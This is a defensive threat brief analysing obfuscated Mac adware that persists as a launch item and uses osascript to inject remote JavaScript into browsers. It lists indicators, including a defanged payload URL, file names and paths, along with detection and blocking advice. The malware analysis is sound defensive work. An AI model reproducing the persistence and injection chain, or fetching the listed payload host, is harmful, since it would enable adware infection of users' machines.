Mac Adware Injecting Malicious JavaScript via Obfuscated Python Script

This brief details the analysis of a persistent Mac adware sample, potentially a component of the OSX.Pirrit family, first brought to light by Paul Taykalo of MacPaw. The adware employs multiple layers of obfuscation, including compiled Python bytecode, base64 encoding, zlib compression, and variable renaming, to evade traditional antivirus detection. Initial analysis of the VtZkT sample showed it was initially undetected by most AV engines on VirusTotal. The adware persists via a launch item, executing a Python script that ultimately injects malicious JavaScript into web pages. The analysis highlights the techniques used to deobfuscate the code and reveal the adware’s functionality, including the URL from which it downloads malicious JavaScript: hxxps://1049434604.rsc.cdn77.org/ij1.min.js.

Attack Chain

1. The adware is likely installed via shareware installers or trojanized applications, such as fake Adobe Flash installers.
2. A bash script (CqfeP) is persisted as a launch item to ensure the adware is automatically started each time the user logs into their Mac.
3. The bash script changes directory to /Users/<user>/Library/search.amp.
4. The bash script executes a compiled Python script (5mLen) with the f= parameter specifying another file (6bLJC).
5. The 5mLen script decompresses and decodes the contents of 6bLJC, which contains base64 encoded and XORed data.
6. The decoded script replaces placeholders like pid_REPLACE, script_to_inject_REPLACE, and MID_REPLACE with values including a PID flag, the URL hxxps://1049434604.rsc.cdn77.org/ij1.min.js, and a machine identifier.
7. The script executes the resulting JavaScript via osascript, injecting it into the current user’s web browser.
8. The injected JavaScript likely displays advertisements or redirects user traffic for malicious purposes.

Impact

The adware injects malicious JavaScript into web browsers, potentially leading to unwanted advertisements, browser redirects, data theft, or other malicious activities. While the exact scope of the campaign is unknown, the use of obfuscation techniques suggests a deliberate attempt to evade detection and target a wide range of Mac users. The injected JavaScript can compromise user experience and potentially lead to further malware infections.

Recommendation

• Monitor for the execution of osascript with suspicious arguments, specifically those containing injected JavaScript, using the Sigma rule “Detect JavaScript Injection via osascript”.
• Block network connections to 1049434604.rsc.cdn77.org at the firewall or DNS resolver based on the IOC identified in this brief.
• Monitor for the creation and execution of files within the ~/Library/search.amp directory.
• Inspect shell scripts executed from user LaunchAgents for suspicious python calls.